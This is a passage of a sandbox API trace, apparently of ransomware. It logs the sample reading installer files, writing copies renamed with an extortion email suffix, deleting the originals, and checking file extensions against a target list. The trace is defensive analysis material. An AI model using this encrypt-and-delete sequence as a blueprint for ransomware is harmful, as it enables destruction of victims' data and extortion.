(lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.302] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=65238) returned 1 [0047.302] CloseHandle (hObject=0x300) returned 1 [0047.303] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 0x80 [0047.303] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.303] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.303] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.303] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.303] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.303] GetLastError () returned 0x0 [0047.303] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xfed6, lpOverlapped=0x0) returned 1 [0047.306] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xfee0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xfee0, lpOverlapped=0x0) returned 1 [0047.308] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.308] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.308] SetEndOfFile (hFile=0x2d0) returned 1 [0047.308] CloseHandle (hObject=0x2d0) returned 1 [0047.310] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.311] SetEndOfFile (hFile=0x300) returned 1 [0047.312] CloseHandle (hObject=0x300) returned 1 [0047.312] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.312] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 1 [0047.312] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.312] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.313] lstrlenW (lpString=".doc") returned 4 [0047.313] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString=".docx") returned 5 [0047.313] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.313] lstrlenW (lpString=".pdf") returned 4 [0047.313] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString=".xls") returned 4 [0047.313] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString=".xlsx") returned 5 [0047.313] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.313] lstrlenW (lpString=".ppt") returned 4 [0047.313] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.313] lstrlenW (lpString=".zip") returned 4 [0047.313] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.313] lstrlenW (lpString=".rar") returned 4 [0047.313] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString=".bz2") returned 4 [0047.313] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString=".7z") returned 3 [0047.313] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.313] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.313] lstrlenW (lpString=".dbf") returned 4 [0047.313] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.313] lstrlenW (lpString=".1cd") returned 4 [0047.313] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.313] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.313] lstrlenW (lpString=".jpg") returned 4 [0047.313] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.314] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.314] lstrlenW (lpString=".doc") returned 4 [0047.314] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString=".docx") returned 5 [0047.314] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.314] lstrlenW (lpString=".pdf") returned 4 [0047.314] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString=".xls") returned 4 [0047.314] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString=".xlsx") returned 5 [0047.314] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.314] lstrlenW (lpString=".ppt") returned 4 [0047.314] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.314] lstrlenW (lpString=".zip") returned 4 [0047.314] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.314] lstrlenW (lpString=".rar") returned 4 [0047.314] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString=".bz2") returned 4 [0047.314] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString=".7z") returned 3 [0047.314] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.314] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.314] lstrlenW (lpString=".dbf") returned 4 [0047.314] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.314] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.314] lstrlenW (lpString=".1cd") returned 4 [0047.315] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.315] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0047.315] lstrlenW (lpString=".jpg") returned 4 [0047.315] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.315] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.315] lstrlenW (lpString="eula.rtf") returned 8 [0047.315] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.316] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3546) returned 1 [0047.316] CloseHandle (hObject=0x300) returned 1 [0047.316] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 0x80 [0047.316] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.316] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.316] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.316] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.316] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.334] GetLastError () returned 0x0 [0047.334] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xdda, lpOverlapped=0x0) returned 1 [0047.337] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xde0, lpOverlapped=0x0) returned 1 [0047.339] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.339] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.340] SetEndOfFile (hFile=0x2e4) returned 1 [0047.340] CloseHandle (hObject=0x2e4) returned 1 [0047.340] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.341] SetEndOfFile (hFile=0x300) returned 1 [0047.341] CloseHandle (hObject=0x300) returned 1 [0047.342] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.342] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 1 [0047.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.342] lstrlenW (lpString=".doc") returned 4 [0047.342] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.342] lstrlenW (lpString=".docx") returned 5 [0047.342] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.342] lstrlenW (lpString=".pdf") returned 4 [0047.342] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.343] lstrlenW (lpString=".xls") returned 4 [0047.343] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.343] lstrlenW (lpString=".xlsx") returned 5 [0047.343] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.343] lstrlenW (lpString=".ppt") returned 4 [0047.343] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.343] lstrlenW (lpString=".zip") returned 4 [0047.343] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.343] lstrlenW (lpString=".rar") returned 4 [0047.343] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.343] lstrlenW (lpString=".bz2") returned 4 [0047.343] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.343] lstrlenW (lpString=".7z") returned 3 [0047.343] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.343] lstrlenW (lpString=".dbf") returned 4 [0047.343] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.343] lstrlenW (lpString=".1cd") returned 4 [0047.343] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.344] lstrlenW (lpString=".jpg") returned 4 [0047.344] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.344] lstrlenW (lpString=".doc") returned 4 [0047.344] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString=".docx") returned 5 [0047.344] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.344] lstrlenW (lpString=".pdf") returned 4 [0047.344] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString=".xls") returned 4 [0047.344] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.344] lstrlenW (lpString=".xlsx") returned 5 [0047.344] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.344] lstrlenW (lpString=".ppt") returned 4 [0047.344] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.344] lstrlenW (lpString=".zip") returned 4 [0047.344] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.344] lstrlenW (lpString=".rar") returned 4 [0047.344] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString=".bz2") returned 4 [0047.344] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.344] lstrlenW (lpString=".7z") returned 3 [0047.344] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.344] lstrlenW (lpString=".dbf") returned 4 [0047.345] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.345] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.345] lstrlenW (lpString=".1cd") returned 4 [0047.345] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.345] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0047.345] lstrlenW (lpString=".jpg") returned 4 [0047.345] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.345] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.345] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.345] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.345] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=79634) returned 1 [0047.345] CloseHandle (hObject=0x300) returned 1 [0047.345] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 0x80 [0047.345] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.346] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.346] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.346] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.346] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.346] GetLastError () returned 0x0 [0047.346] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x13712, lpOverlapped=0x0) returned 1 [0047.861] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x13720, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x13720, lpOverlapped=0x0) returned 1 [0047.863] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.863] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.863] SetEndOfFile (hFile=0x2e4) returned 1 [0047.863] CloseHandle (hObject=0x2e4) returned 1 [0047.865] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.865] SetEndOfFile (hFile=0x300) returned 1 [0047.866] CloseHandle (hObject=0x300) returned 1 [0047.869] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.869] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 1 [0047.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.870] lstrlenW (lpString=".doc") returned 4 [0047.870] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString=".docx") returned 5 [0047.870] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.870] lstrlenW (lpString=".pdf") returned 4 [0047.870] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString=".xls") returned 4 [0047.870] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString=".xlsx") returned 5 [0047.870] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.870] lstrlenW (lpString=".ppt") returned 4 [0047.870] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.870] lstrlenW (lpString=".zip") returned 4 [0047.870] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.870] lstrlenW (lpString=".rar") returned 4 [0047.870] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString=".bz2") returned 4 [0047.870] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString=".7z") returned 3 [0047.870] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.870] lstrlenW (lpString=".dbf") returned 4 [0047.870] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.870] lstrlenW (lpString=".1cd") returned 4 [0047.871] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString=".jpg") returned 4 [0047.871] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString=".doc") returned 4 [0047.871] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString=".docx") returned 5 [0047.871] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.871] lstrlenW (lpString=".pdf") returned 4 [0047.871] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString=".xls") returned 4 [0047.871] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString=".xlsx") returned 5 [0047.871] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.871] lstrlenW (lpString=".ppt") returned 4 [0047.871] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString=".zip") returned 4 [0047.871] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.871] lstrlenW (lpString=".rar") returned 4 [0047.871] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString=".bz2") returned 4 [0047.871] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString=".7z") returned 3 [0047.871] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString=".dbf") returned 4 [0047.871] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.871] lstrlenW (lpString=".1cd") returned 4 [0047.871] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0047.872] lstrlenW (lpString=".jpg") returned 4 [0047.872] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.872] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.872] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0047.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.872] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=201796) returned 1 [0047.872] CloseHandle (hObject=0x300) returned 1 [0047.874] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 0x80 [0047.874] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.874] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.874] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.874] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.874] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.874] GetLastError () returned 0x0 [0047.874] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x31444, lpOverlapped=0x0) returned 1 [0048.007] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x31450, lpOverlapped=0x0) returned 1 [0048.010] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.010] 